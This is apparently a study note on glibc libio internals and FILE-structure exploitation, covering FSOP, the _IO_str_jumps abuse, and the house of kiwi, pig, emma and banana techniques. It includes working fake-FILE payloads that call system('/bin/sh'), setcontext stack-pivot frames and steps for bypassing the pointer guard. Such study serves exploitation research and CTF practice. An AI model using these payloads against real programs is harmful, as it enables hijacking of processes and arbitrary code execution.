JUMP_INIT(xsputn, _IO_wdefault_xsputn),
JUMP_INIT(xsgetn, _IO_wdefault_xsgetn),
JUMP_INIT(seekoff, _IO_wstr_seekoff),
JUMP_INIT(seekpos, _IO_default_seekpos),
JUMP_INIT(setbuf, _IO_default_setbuf),
JUMP_INIT(sync, _IO_default_sync),
JUMP_INIT(doallocate, _IO_wdefault_doallocate),
JUMP_INIT(read, _IO_default_read),
JUMP_INIT(write, _IO_default_write),
JUMP_INIT(seek, _IO_default_seek),
JUMP_INIT(close, _IO_default_close),
JUMP_INIT(stat, _IO_default_stat),
JUMP_INIT(showmanyc, _IO_default_showmanyc),
JUMP_INIT(imbue, _IO_default_imbue)
};

_IO_obstack_jumps

/* the jump table.  */
const struct _IO_jump_t _IO_obstack_jumps libio_vtable attribute_hidden =
{
JUMP_INIT_DUMMY,
JUMP_INIT(finish, NULL),
JUMP_INIT(overflow, _IO_obstack_overflow),
JUMP_INIT(underflow, NULL),
JUMP_INIT(uflow, NULL),
JUMP_INIT(pbackfail, NULL),
JUMP_INIT(xsputn, _IO_obstack_xsputn),
JUMP_INIT(xsgetn, NULL),
JUMP_INIT(seekoff, NULL),
JUMP_INIT(seekpos, NULL),
JUMP_INIT(setbuf, NULL),
JUMP_INIT(sync, NULL),
JUMP_INIT(doallocate, NULL),
JUMP_INIT(read, NULL),
JUMP_INIT(write, NULL),
JUMP_INIT(seek, NULL),
JUMP_INIT(close, NULL),
JUMP_INIT(stat, NULL),
JUMP_INIT(showmanyc, NULL),
JUMP_INIT(imbue, NULL)
};

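How IO_FILE structures are used

Initialization

Initially there are three _IO_FILE structures:
  • _IO_2_1_stderr_
  • _IO_2_1_stdout_
  • _IO_2_1_stdin_
They are linked through _IO_list_all, with _chain pointing to the next structure:
  • _IO_list_all->_IO_2_1_stderr_->_IO_2_1_stdout_->_IO_2_1_stdin_
There are also 3 global pointers:
  • stdin points to _IO_2_1_stdin_
  • stdout points to _IO_2_1_stdout_
  • stderr points to _IO_2_1_stderr_
The function-pointer structure vtable holds pointers to the various IO-related functions.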

fopen

  • fopen
  • _IO_new_fopen
  • __fopen_internal
  • malloc allocates a locked_FILE structure
  • _IO_no_init null-initializes the structure
  • _IO_file_init links the structure into _IO_list_all
  • _IO_file_open issues the system call that opens the file

fread

  • fread
  • _IO_sgetn
  • _IO_file_xsgetn
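  • If the buffer is not initialized, call _IO_doallocbuf->_IO_file_doallocate to initialize the IO buffer: a heap chunk is allocated and only _IO_buf_base and _IO_buf_end are set
  • If the buffer holds data not yet copied to the destination, copy as much of it as possible, without exceeding the amount requested
  • If the buffer is shorter than the requested length, reset the buffer's read/write pointers
  • __underflow calls _IO_SYSREAD to read data into the buffer through the system call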
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x555555559000
Size: 0x290 (with flag bits: 0x291)

Allocated chunk | PREV_INUSE
Addr: 0x555555559290
Size: 0x1e0 (with flag bits: 0x1e1)

Allocated chunk | PREV_INUSE
Addr: 0x555555559470
Size: 0x1010 (with flag bits: 0x1011)

Top chunk | PREV_INUSE
Addr: 0x55555555a480
Size: 0x1fb80 (with flag bits: 0x1fb81)

pwndbg> p *(struct _IO_FILE_plus*) 0x5555555592a0
$2 = {
file = {
_flags = -72539000,
_IO_read_ptr = 0x0,
_IO_read_end = 0x0,
_IO_read_base = 0x0,
_IO_write_base = 0x0,
_IO_write_ptr = 0x0,
_IO_write_end = 0x0,
_IO_buf_base = 0x555555559480 "",
_IO_buf_end = 0x55555555a480 "",
_IO_save_base = 0x0,
_IO_backup_base = 0x0,
_IO_save_end = 0x0,
_markers = 0x0,
_chain = 0x7ffff7e044e0 <_IO_2_1_stderr_>,
_fileno = 3,
_flags2 = 0,
_old_offset = 0,
_cur_column = 0,
_vtable_offset = 0 '\000',
_shortbuf = "",
_lock = 0x555555559380,
_offset = -1,
_codecvt = 0x0,
_wide_data = 0x555555559390,
_freeres_list = 0x0,
_freeres_buf = 0x0,
__pad5 = 0,
_mode = 0,
_unused2 = '\000' <repeats 19 times>
},
vtable = 0x7ffff7e02030 <_IO_file_jumps>
}
pwndbg> tele 0x5555555592a0
00:0000│ rbx 0x5555555592a0 ◂— 0xfbad2488
01:0008│ 0x5555555592a8 ◂— 0
... ↓ 5 skipped
07:0038│ 0x5555555592d8 —▸ 0x555555559480 ◂— 0
pwndbg>
08:0040│ 0x5555555592e0 —▸ 0x55555555a480 ◂— 0
09:0048│ 0x5555555592e8 ◂— 0
... ↓ 3 skipped
0d:0068│ 0x555555559308 —▸ 0x7ffff7e044e0 (_IO_2_1_stderr_) ◂— 0xfbad2086
0e:0070│ 0x555555559310 ◂— 3
0f:0078│ 0x555555559318 ◂— 0
pwndbg>
10:0080│ 0x555555559320 ◂— 0
11:0088│ 0x555555559328 —▸ 0x555555559380 ◂— 1
12:0090│ 0x555555559330 ◂— 0xffffffffffffffff
13:0098│ 0x555555559338 ◂— 0
14:00a0│ 0x555555559340 —▸ 0x555555559390 ◂— 0
15:00a8│ 0x555555559348 ◂— 0
... ↓ 2 skipped
pwndbg>
18:00c0│ 0x555555559360 ◂— 0
... ↓ 2 skipped
1b:00d8│ 0x555555559378 —▸ 0x7ffff7e02030 (_IO_file_jumps) ◂— 0
1c:00e0│ 0x555555559380 ◂— 1
1d:00e8│ 0x555555559388 —▸ 0x7ffff7fb2740 ◂— 0x7ffff7fb2740
1e:00f0│ 0x555555559390 ◂— 0
1f:00f8│ 0x555555559398 ◂— 0
pwndbg>
20:0100│ 0x5555555593a0 ◂— 0
... ↓ 7 skipped
pwndbg>
28:0140│ 0x5555555593e0 ◂— 0
... ↓ 7 skipped
pwndbg>
30:0180│ 0x555555559420 ◂— 0
... ↓ 7 skipped
pwndbg>
38:01c0│ 0x555555559460 ◂— 0
39:01c8│ 0x555555559468 ◂— 0
3a:01d0│ 0x555555559470 —▸ 0x7ffff7e02228 (_IO_wfile_jumps) ◂— 0
3b:01d8│ 0x555555559478 ◂— 0x1011
3c:01e0│ rsi 0x555555559480 ◂— 0
... ↓ 3 skipped
pwndbg> tele 0x555555559470
00:0000│ 0x555555559470 —▸ 0x7ffff7e02228 (_IO_wfile_jumps) ◂— 0
01:0008│ 0x555555559478 ◂— 0x1011
02:0010│ rax rsi 0x555555559480 ◂— 'your_flag_content\n'
03:0018│ 0x555555559488 ◂— 'g_content\n'
04:0020│ 0x555555559490 ◂— 0xa74 /* 't\n' */
05:0028│ 0x555555559498 ◂— 0
... ↓ 2 skipped

fwrite

  • fwrite
  • _IO_fwrite
  • _IO_file_xsputn
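  • If the buffer has free space, copy as much of the pending output into it as fits
  • If some data could not be copied into the buffer, call _IO_new_file_overflow to output and flush the output buffer
  • new_do_write writes out the data directly
  • If data remains, call _IO_default_xsputn to copy it into the output buffer; if the remaining length is over 20 bytes memcpy is used, otherwise bytes are copied one at a time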

fclose

  • fclose
  • _IO_new_fclose
  • _IO_un_link
  • _IO_file_close_it

vtable

fopen

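fopen only allocates space and builds the FILE structure; it calls no vtable functions

fread

  • _IO_sgetn calls _IO_file_xsgetn
  • _IO_doallocbuf calls _IO_file_doallocate to initialize the input buffer
  • _IO_file_doallocate calls __GI__IO_file_stat to get file information
  • __underflow calls _IO_new_file_underflow to read file data
  • _IO_new_file_underflow calls __GI__IO_file_read from the vtable, which finally performs the read system call

fwrite

  • _IO_fwrite calls _IO_new_file_xsputn
  • _IO_new_file_xsputn calls _IO_new_file_overflow to set up and flush the buffer
  • _IO_new_file_overflow calls _IO_file_doallocate to initialize the buffer
  • _IO_file_doallocate calls __GI__IO_file_stat from the vtable to get file information
  • _IO_SYSWRITE in new_do_write calls _IO_new_file_write from the vtable, which finally performs the write system call

fclose

  • _IO_do_write, which flushes the buffer, calls vtable functions
  • Closing the file descriptor: _IO_SYSCLOSE calls __close from the vtable
  • _IO_FINISH calls __finish from the vtable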

FSOP

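  • Core idea: hijack _IO_list_all so that it points to a forged _IO_FILE_plus, then make the program run _IO_flush_all_lockp. This function flushes the file stream of every entry in the _IO_list_all list, which amounts to calling fflush on each FILE and therefore calls _IO_overflow from _IO_FILE_plus.vtable
  • Prerequisites:
    • _IO_flush_all_lockp is executed in three situations:
      • When libc runs its abort path (no longer flushes after 2.27)
      • When exit is called (only flushes stderr; no longer flushes after 2.36)
      • When execution returns from main
    • Bypass the checks

Backtrace for abort: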

_IO_flush_all_lockp (do_lock=do_lock@entry=0x0)
__GI_abort ()
__libc_message (do_abort=do_abort@entry=0x2, fmt=fmt@entry=0x7ffff7ba0d58 "*** Error in `%s': %s: 0x%s ***\n")
malloc_printerr (action=0x3, str=0x7ffff7ba0e90 "double free or corruption (top)", ptr=<optimized out>, ar_ptr=<optimized out>)
_int_free (av=0x7ffff7dd4b20 <main_arena>, p=<optimized out>,have_lock=0x0)
main ()
__libc_start_main (main=0x400566 <main>, argc=0x1, argv=0x7fffffffe578, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe568)
_start ()
Backtrace for exit:
_IO_flush_all_lockp (do_lock=do_lock@entry=0x0)
_IO_cleanup ()
__run_exit_handlers (status=0x0, listp=<optimized out>, run_list_atexit=run_list_atexit@entry=0x1)
__GI_exit (status=<optimized out>)
main ()
__libc_start_main (main=0x400566 <main>, argc=0x1, argv=0x7fffffffe578, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe568)
_start ()
Backtrace for a normal return from main:
_IO_flush_all_lockp (do_lock=do_lock@entry=0x0)
_IO_cleanup ()
__run_exit_handlers (status=0x0, listp=<optimized out>, run_list_atexit=run_list_atexit@entry=0x1)
__GI_exit (status=<optimized out>)
__libc_start_main (main=0x400526 <main>, argc=0x1, argv=0x7fffffffe578, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe568)
_start ()

if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)) && _IO_OVERFLOW(fp, EOF) == EOF) {
result = EOF;
}
fake_file = b""
fake_file += b"/bin/sh\x00" # _flags, normally the 0xfbad magic number; here the command string
fake_file += p64(0) # _IO_read_ptr
fake_file += p64(0) # _IO_read_end
fake_file += p64(0) # _IO_read_base
fake_file += p64(0) # _IO_write_base
fake_file += p64(libc.sym['system']) # _IO_write_ptr
fake_file += p64(0) # _IO_write_end
fake_file += p64(0) # _IO_buf_base;
fake_file += p64(0) # _IO_buf_end should usually be (_IO_buf_base + 1)
fake_file += p64(0) * 4 # from _IO_save_base to _markers
fake_file += p64(libc.sym['_IO_2_1_stdout_']) # the FILE chain ptr
fake_file += p32(2) # _fileno for stderr is 2
fake_file += p32(0) # _flags2, usually 0
fake_file += p64(0xFFFFFFFFFFFFFFFF) # _old_offset, -1
fake_file += p16(0) # _cur_column
fake_file += b"\x00" # _vtable_offset
fake_file += b"\n" # _shortbuf[1]
fake_file += p32(0) # padding
fake_file += p64(libc.sym['_IO_2_1_stdout_'] + 0x1ea0) # _IO_stdfile_1_lock
fake_file += p64(0xFFFFFFFFFFFFFFFF) # _offset, -1
fake_file += p64(0) # _codecvt, usually 0
fake_file += p64(libc.sym['_IO_2_1_stdout_'] - 0x160) # _IO_wide_data_1
fake_file += p64(0) * 3 # from _freeres_list to __pad5
fake_file += p32(0xFFFFFFFF) # _mode, usually -1
fake_file += b"\x00" * 19 # _unused2
fake_file = fake_file.ljust(0xD8, b'\x00') # adjust to vtable
fake_file += p64(libc.sym['_IO_2_1_stderr_'] + 0x10) # fake vtable

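Buffer exploitation (incomplete)

stdin

Arbitrary address write

stdout

Arbitrary address write

Arbitrary address read

_IO_str_jumps (up to 2.27)

  • Put _IO_str_jumps or _IO_wstr_jumps into the vtable to pass the IO_validate_vtable check

  • Locate _IO_str_jumps

    • _IO_str_jumps is not an exported symbol, so libc.sym["_IO_str_jumps"] does not find it; an exported function stored in it, such as _IO_str_underflow, can be used to help locate it
    • First get the address of _IO_str_underflow, then find all pointers to that address
    • _IO_str_underflow is at offset 0x20 within _IO_str_jumps, and _IO_str_jumps lies above _IO_file_jumps, so the smallest address satisfying these conditions is taken as _IO_str_jumps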
      from bisect import *

      IO_file_jumps = libc.symbols['_IO_file_jumps']
      IO_str_underflow = libc.symbols['_IO_str_underflow']
      IO_str_underflow_ptr = list(libc.search(p64(IO_str_underflow)))
      IO_str_jumps = IO_str_underflow_ptr[bisect_left(IO_str_underflow_ptr, IO_file_jumps + 0x20)] - 0x20
      print(hex(IO_str_jumps))
  • Hijack _IO_str_finish

    void
    _IO_str_finish (_IO_FILE *fp, int dummy)
    {
    if (fp->_IO_buf_base && !(fp->_flags & _IO_USER_BUF))
    (((_IO_strfile *) fp)->_s._free_buffer) (fp->_IO_buf_base);
    fp->_IO_buf_base = NULL;

    _IO_default_finish (fp, 0);
    }

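  • Point the vtable at &_IO_str_jumps - 8: the _IO_OVERFLOW slot (vtable+0x18) then holds the finish entry, so _IO_str_finish is executed

  • fp->_IO_buf_base must be non-NULL; it is passed as the first argument of fp->_s._free_buffer, so it can be the address of /bin/sh

  • fp->_flags must not contain _IO_USER_BUF (#define _IO_USER_BUF 1), i.e. the lowest bit of fp->_flags is 0

  • _IO_write_base < _IO_write_ptr and _mode <= 0

  • Set ((_IO_strfile *) fp)->_s._free_buffer to the address of system, i.e. write system's address at fp+0xE8

  • Trigger _IO_flush_all_lockp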
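The conditions above can be collected into one fake FILE. This is a sketch for glibc versions up to 2.27 on x86-64; io_str_jumps, system and binsh are hypothetical leaked addresses, and depending on the trigger path other fields (for example _lock) may also need valid values. It also shows why vtable = &_IO_str_jumps - 8 works: _IO_jump_t starts with two dummy words, so finish is at +0x10 and overflow at +0x18.

```python
import struct

# Fake FILE for the _IO_str_finish route (glibc <= 2.27, x86-64).
def str_finish_file(io_str_jumps: int, system: int, binsh: int) -> bytes:
    buf = bytearray(0xf0)
    struct.pack_into("<Q", buf, 0x00, 0)                  # _flags: _IO_USER_BUF bit clear
    struct.pack_into("<Q", buf, 0x20, 0)                  # _IO_write_base
    struct.pack_into("<Q", buf, 0x28, 1)                  # _IO_write_ptr > _IO_write_base
    struct.pack_into("<Q", buf, 0x38, binsh)              # _IO_buf_base -> "/bin/sh"
    struct.pack_into("<i", buf, 0xc0, 0)                  # _mode <= 0
    struct.pack_into("<Q", buf, 0xd8, io_str_jumps - 8)   # vtable
    struct.pack_into("<Q", buf, 0xe8, system)             # _s._free_buffer
    return bytes(buf)

def overflow_slot(vtable: int) -> int:
    # _IO_jump_t layout: dummy, dummy2, finish (+0x10), overflow (+0x18)
    return vtable + 0x18

f = str_finish_file(0x7ffff7dd07a0, 0x7ffff7a52390, 0x7ffff7b99d57)  # hypothetical addresses
vt = struct.unpack_from("<Q", f, 0xd8)[0]
print(hex(overflow_slot(vt)))   # 0x7ffff7dd07b0 == _IO_str_jumps + 0x10 (finish)
```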

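Combining with heap exploitation

leak libc

libc-2.23

  • Use a fastbin attack to allocate a fastbin chunk at _IO_2_1_stdout_-0x43
  • Overwrite the lowest byte of the _IO_write_base pointer so that it points to the _chain field, which holds the address of the _IO_2_1_stdin_ structure; the next time the program prints anything, the contents of the write buffer are output first

vtable

  • Use a fastbin attack to allocate a 0x60 chunk at _IO_2_1_stdout_+157
  • Point the vtable pointer at a pre-forged vtable (*(vtable+0x10)=system_addr). When an IO function is called, the _IO_2_1_stdout_ structure pointer is passed as the argument to the vtable function, so write ;sh; into the 4 bytes of padding after the flag field of _IO_2_1_stdout_

house of orange

See the attack section.

house of husk

See the attack section.

house of kiwi (up to 2.36)

  • Calls a vtable function without going through exit, via the assertion in sysmalloc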

assert ((old_top == initial_top (av) && old_size == 0) ||
((unsigned long) (old_size) >= MINSIZE &&
prev_inuse (old_top) &&
((unsigned long) old_end & (pagesize - 1)) == 0));
__malloc_assert
static void
__malloc_assert (const char *assertion, const char *file, unsigned int line,
const char *function)
{
(void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
__progname, __progname[0] ? ": " : "",
file, line,
function ? function : "", function ? ": " : "",
assertion);
fflush (stderr);
abort ();
}
This abuses _IO_fflush inside fflush, which executes call [rbp + 0x60] with rbp pointing to _IO_file_jumps, i.e. it calls _IO_new_file_sync. Since _IO_file_jumps is writable, overwriting its _IO_new_file_sync pointer with a one_gadget is enough to get a shell

setcontext+61
.text:0000000000050C0D mov     rsp, [rdx+0A0h]
.text:0000000000050C14 mov rbx, [rdx+80h]
.text:0000000000050C1B mov rbp, [rdx+78h]
.text:0000000000050C1F mov r12, [rdx+48h]
.text:0000000000050C23 mov r13, [rdx+50h]
.text:0000000000050C27 mov r14, [rdx+58h]
.text:0000000000050C2B mov r15, [rdx+60h]
.text:0000000000050C2F test dword ptr fs:48h, 2
.text:0000000000050C3B jz loc_50CF6
...
.text:0000000000050CF6 loc_50CF6: ; CODE XREF: setcontext+6B↑j
.text:0000000000050CF6 mov rcx, [rdx+0A8h]
.text:0000000000050CFD push rcx
.text:0000000000050CFE mov rsi, [rdx+70h]
.text:0000000000050D02 mov rdi, [rdx+68h]
.text:0000000000050D06 mov rcx, [rdx+98h]
.text:0000000000050D0D mov r8, [rdx+28h]
.text:0000000000050D11 mov r9, [rdx+30h]
.text:0000000000050D15 mov rdx, [rdx+88h]
.text:0000000000050D15 ; } // starts at 50BD0
.text:0000000000050D1C ; __unwind {
.text:0000000000050D1C xor eax, eax
.text:0000000000050D1E retn

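When _IO_new_file_sync is called, rdx points to the _IO_helper_jumps structure, so the registers can be set by modifying the contents of _IO_helper_jumps

Taking ROP as an example, rsp must be set to the start of the pre-placed ROP chain, and rip must be set to a ret instruction

Given an arbitrary write, overwrite the _IO_file_sync pointer at _IO_file_jumps + 0x60 with setcontext+61, and set _IO_helper_jumps + 0xA0 and + 0xA8 to the location of the ROP chain to pivot to and to the address of a ret gadget respectively; this pivots the stack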
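The memory rdx points to can be laid out from the offsets in the setcontext+61 disassembly above. A sketch under these assumptions: x86-64, this particular libc build, the jz at 0x50C3B is taken so execution reaches loc_50CF6, and all addresses are hypothetical. Note that push rcx stores the ret gadget at rop_stack - 8 after rsp is loaded, so those 8 bytes get clobbered; retn then jumps to the ret gadget, which in turn pops the first ROP entry at rop_stack.

```python
import struct

# Frame read by setcontext+61 through rdx (offsets from the disassembly above).
def setcontext_frame(rop_stack: int, ret_gadget: int, rdi=0, rsi=0, rdx=0) -> bytes:
    frame = bytearray(0xb0)
    struct.pack_into("<Q", frame, 0x68, rdi)         # mov rdi, [rdx+68h]
    struct.pack_into("<Q", frame, 0x70, rsi)         # mov rsi, [rdx+70h]
    struct.pack_into("<Q", frame, 0x88, rdx)         # mov rdx, [rdx+88h]
    struct.pack_into("<Q", frame, 0xa0, rop_stack)   # mov rsp, [rdx+0A0h]
    struct.pack_into("<Q", frame, 0xa8, ret_gadget)  # mov rcx, [rdx+0A8h]; push rcx; ... retn
    return bytes(frame)

frame = setcontext_frame(rop_stack=0x4050a0, ret_gadget=0x401016)  # hypothetical addresses
```

In the kiwi setup this frame is what gets written at _IO_helper_jumps (only the 0xA0/0xA8 entries are strictly needed for the pivot).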

house of pig (still gives an arbitrary write)

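  • At least a UAF
  1. First use the UAF to leak the libc and heap addresses
  2. Then use the UAF to modify fd_nextsize and bk_nextsize of a largebin chunk and perform a largebin attack that writes a heap address to __free_hook-0x8. This satisfies the later tcache stashing unlink attack's requirement that the address at the bk position of the target fake chunk be writable
  3. Prepare 5 tcache chunks of one size, then use the UAF to modify fd and bk of a smallbin chunk of that size and perform a tcache stashing unlink attack. Because the previous step wrote a writable heap address to __free_hook-0x8, the location __free_hook-0x10 can be treated as a fake chunk and placed at the head of the tcache list; however, without a malloc we cannot allocate it yet
  4. Finally use the UAF to modify fd_nextsize and bk_nextsize of a largebin chunk again and perform a second largebin attack that writes a heap address to _IO_list_all. When all IO streams are flushed before the program exits, this heap address is treated as a FILE structure, so we can build an arbitrary FILE structure there
  5. When building the FILE structure at this heap address, the key is to change its vtable from _IO_file_jumps to _IO_str_jumps. Then, where IO_file_overflow would normally be called, IO_str_overflow is called instead. This function takes the FILE address itself as its argument and calls malloc, memcpy and free in sequence, all with arguments controlled by data in the FILE structure. With suitably crafted FILE data, the malloc in IO_str_overflow returns the fake chunk containing __free_hook that was placed at the head of the tcache list; the memcpy then copies data prepared on the heap into that chunk, giving full control of __free_hook, which can be set to the address of system; finally, the free in IO_str_overflow triggers __free_hook. If the prepared heap data starts with the string /bin/sh\x00, this ends up executing system("/bin/sh")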

house of emma

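Change the vtable from _IO_file_jumps to _IO_cookie_jumps+offset, so that the slot that gets called (after adding the offset) lands on _IO_cookie_write.
_IO_cookie_write then calls a function pointer directly, so with the offset set correctly we can take control of execution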

static const struct _IO_jump_t _IO_cookie_jumps libio_vtable = {  
JUMP_INIT_DUMMY,
JUMP_INIT(finish, _IO_file_finish),
JUMP_INIT(overflow, _IO_file_overflow),
JUMP_INIT(underflow, _IO_file_underflow),
JUMP_INIT(uflow, _IO_default_uflow),
JUMP_INIT(pbackfail, _IO_default_pbackfail),
JUMP_INIT(xsputn, _IO_file_xsputn),
JUMP_INIT(xsgetn, _IO_default_xsgetn),
JUMP_INIT(seekoff, _IO_cookie_seekoff),
JUMP_INIT(seekpos, _IO_default_seekpos),
JUMP_INIT(setbuf, _IO_file_setbuf),
JUMP_INIT(sync, _IO_file_sync),
JUMP_INIT(doallocate, _IO_file_doallocate),
JUMP_INIT(read, _IO_cookie_read),
JUMP_INIT(write, _IO_cookie_write),
JUMP_INIT(seek, _IO_cookie_seek),
JUMP_INIT(close, _IO_cookie_close),
JUMP_INIT(stat, _IO_default_stat),
JUMP_INIT(showmanyc, _IO_default_showmanyc),
JUMP_INIT(imbue, _IO_default_imbue),
};

It contains _IO_cookie_read, _IO_cookie_write, _IO_cookie_seek and _IO_cookie_close:

static ssize_t  
_IO_cookie_read (FILE *fp, void *buf, ssize_t size) // read
{
struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
cookie_read_function_t *read_cb = cfile->__io_functions.read;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (read_cb);
#endif

if (read_cb == NULL)
return -1;

return read_cb (cfile->__cookie, buf, size);
}

static ssize_t
_IO_cookie_write (FILE *fp, const void *buf, ssize_t size) // write
{
struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
cookie_write_function_t *write_cb = cfile->__io_functions.write;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (write_cb);
#endif

if (write_cb == NULL)
{
fp->_flags |= _IO_ERR_SEEN;
return 0;
}

ssize_t n = write_cb (cfile->__cookie, buf, size);
if (n < size)
fp->_flags |= _IO_ERR_SEEN;

return n;
}

static off64_t
_IO_cookie_seek (FILE *fp, off64_t offset, int dir) // seek
{
struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
cookie_seek_function_t *seek_cb = cfile->__io_functions.seek;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (seek_cb);
#endif

return ((seek_cb == NULL
|| (seek_cb (cfile->__cookie, &offset, dir)
== -1)
|| offset == (off64_t) -1)
? _IO_pos_BAD : offset);
}

static int
_IO_cookie_close (FILE *fp) // close
{
struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
cookie_close_function_t *close_cb = cfile->__io_functions.close;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (close_cb);
#endif

if (close_cb == NULL)
return 0;

return close_cb (cfile->__cookie);
}

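Each of these functions makes a direct call through a function pointer stored in the _IO_cookie_file (cfile->__io_functions). The first argument it passes is cfile->__cookie. Before the call, however, the pointer goes through PTR_DEMANGLE. Debugging shows that demangling uses the value at fs:[0x30], so that value can be overwritten with one we know.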

house of banana

exit

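When main() returns, some teardown work has to be done:
  • User space:
    • free the stream buffers in libc, flush stdout's buffer before exiting, release TLS, …
  • Kernel space:
    • close the file descriptors the process opened, free its task struct, …
    • once all resources have been released, the kernel takes the task off the scheduling queue
    • it then sends a signal to the parent process to report that a child has terminated
    • only at this point is the process really finished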

So we can think of it as: process termination = release the resources it holds + stop giving it CPU time.

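At the kernel level, termination goes through the exit system call, which is nothing more than a syscall (glibc's _exit actually issues exit_group, which ends every thread of the process). libc declares it as: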

#include <unistd.h> 
void _exit(int status);

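Calling _exit() directly causes problems, however. For example, data still sitting in stdout's buffer is simply discarded along with the process and never flushed, so output is lost. Therefore some user-level cleanup has to happen before _exit() is called.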

libc names the function responsible for this work exit(). It is declared as follows:

#include <stdlib.h> 
extern void exit (int __status);

void
exit (int status)
{
__run_exit_handlers (status, &__exit_funcs, true, true);
}

void
attribute_hidden
__run_exit_handlers (int status, struct exit_function_list **listp,
bool run_list_atexit, bool run_dtors)
{
/* First, call the TLS destructors. */
#ifndef SHARED
if (&__call_tls_dtors != NULL)
#endif
if (run_dtors)
__call_tls_dtors ();

__libc_lock_lock (__exit_funcs_lock);

/* We do it this way to handle recursive calls to exit () made by
the functions registered with `atexit' and `on_exit'. We call
everyone on the list and use the status value in the last
exit (). */
while (true)
{
struct exit_function_list *cur = *listp;

if (cur == NULL)
{
/* Exit processing complete. We will not allow any more
atexit/on_exit registrations. */
__exit_funcs_done = true;
break;
}

while (cur->idx > 0)
{
struct exit_function *const f = &cur->fns[--cur->idx];
const uint64_t new_exitfn_called = __new_exitfn_called;

switch (f->flavor)
{
void (*atfct) (void);
void (*onfct) (int status, void *arg);
void (*cxafct) (void *arg, int status);
void *arg;

case ef_free:
case ef_us:
break;
case ef_on:
onfct = f->func.on.fn;
arg = f->func.on.arg;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (onfct);
#endif
/* Unlock the list while we call a foreign function. */
__libc_lock_unlock (__exit_funcs_lock);
onfct (status, arg);
__libc_lock_lock (__exit_funcs_lock);
break;
case ef_at:
atfct = f->func.at;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (atfct);
#endif
/* Unlock the list while we call a foreign function. */
__libc_lock_unlock (__exit_funcs_lock);
atfct ();
__libc_lock_lock (__exit_funcs_lock);
break;
case ef_cxa:
/* To avoid dlclose/exit race calling cxafct twice (BZ 22180),
we must mark this function as ef_free. */
f->flavor = ef_free;
cxafct = f->func.cxa.fn;
arg = f->func.cxa.arg;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (cxafct);
#endif
/* Unlock the list while we call a foreign function. */
__libc_lock_unlock (__exit_funcs_lock);
cxafct (arg, status);
__libc_lock_lock (__exit_funcs_lock);
break;
}

if (__glibc_unlikely (new_exitfn_called != __new_exitfn_called))
/* The last exit function, or another thread, has registered
more exit functions. Start the loop over. */
continue;
}

*listp = cur->next;
if (*listp != NULL)
/* Don't free the last element in the chain, this is the statically
allocate element. */
free (cur);
}

__libc_lock_unlock (__exit_funcs_lock);

if (run_list_atexit)
RUN_HOOK (__libc_atexit, ());

_exit (status);
}

struct exit_function
{
/* `flavour' should be of type of the `enum' above but since we need
this element in an atomic operation we have to use `long int'. */
long int flavor;
union
{
void (*at) (void);
struct
{
void (*fn) (int status, void *arg);
void *arg;
} on;
struct
{
void (*fn) (void *arg, int status);
void *arg;
void *dso_handle;
} cxa;
} func;
};
struct exit_function_list
{
struct exit_function_list *next;
size_t idx;
struct exit_function fns[32];
};
extern struct exit_function_list *__exit_funcs attribute_hidden;

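In summary:
  • exit(status)
    • __run_exit_handlers(status)
      • __call_tls_dtors
      • walk exit_function_list, from the last registered entry back to the first
        • ef_cxa: call the functions registered with __cxa_atexit (the atexit shown below forwards to __cxa_atexit, so its handlers land here too)
        • ef_at: call plain void (*)(void) handlers
        • ef_on: call the functions registered with on_exit
        • ...
      • if new handlers were registered meanwhile, restart from the head of the list
      • free the dynamically allocated list nodes
      • if run_list_atexit == true, run __libc_atexit
      • finally call _exit(status)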

__exit_funcs

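The function pointers stored in it are mangled. Decrypting them requires the value at fs:0x30, which is the pointer_guard field of tcbhead_t: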

typedef struct  
{
void *tcb; /* Pointer to the TCB. Not necessarily the
thread descriptor used by libpthread. */
dtv_t *dtv;
void *self; /* Pointer to the thread descriptor. */
int multiple_threads;
int gscope_flag;
uintptr_t sysinfo;
uintptr_t stack_guard;
uintptr_t pointer_guard;
unsigned long int unused_vgetcpu_cache[2];
/* Bit 0: X86_FEATURE_1_IBT.
Bit 1: X86_FEATURE_1_SHSTK.
*/
unsigned int feature_1;
int __glibc_unused1;
/* Reservation of some values for the TM ABI. */
void *__private_tm[4];
/* GCC split stack support. */
void *__private_ss;
/* The lowest address of shadow stack, */
unsigned long long int ssp_base;
/* Must be kept even if it is no longer used by glibc since programs,
like AddressSanitizer, depend on the size of tcbhead_t. */
__128bits __glibc_unused2[8][4] __attribute__ ((aligned (32)));

void *__padding[8];
} tcbhead_t;
Registering exit_function entries

The list walked above holds the functions registered by atexit and its relatives, so let's start from atexit:

/* Register FUNC to be executed by `exit'.  */
int
#ifndef atexit
attribute_hidden
#endif
atexit (void (*func) (void))
{
return __cxa_atexit ((void (*) (void *)) func, NULL, __dso_handle);
}
__cxa_atexit
/* Register a function to be called by exit or when a shared library
is unloaded. This function is only called from code generated by
the C++ compiler. */
int
__cxa_atexit (void (*func) (void *), void *arg, void *d)
{
return __internal_atexit (func, arg, d, &__exit_funcs);
}
libc_hidden_def (__cxa_atexit)
__internal_atexit
int
attribute_hidden
__internal_atexit (void (*func) (void *), void *arg, void *d,
struct exit_function_list **listp)
{
struct exit_function *new;

/* As a QoI issue we detect NULL early with an assertion instead
of a SIGSEGV at program exit when the handler is run (bug 20544). */
assert (func != NULL);

__libc_lock_lock (__exit_funcs_lock);
new = __new_exitfn (listp);

if (new == NULL)
{
__libc_lock_unlock (__exit_funcs_lock);
return -1;
}

#ifdef PTR_MANGLE
PTR_MANGLE (func);
#endif
new->func.cxa.fn = (void (*) (void *, int)) func;
new->func.cxa.arg = arg;
new->func.cxa.dso_handle = d;
new->flavor = ef_cxa;
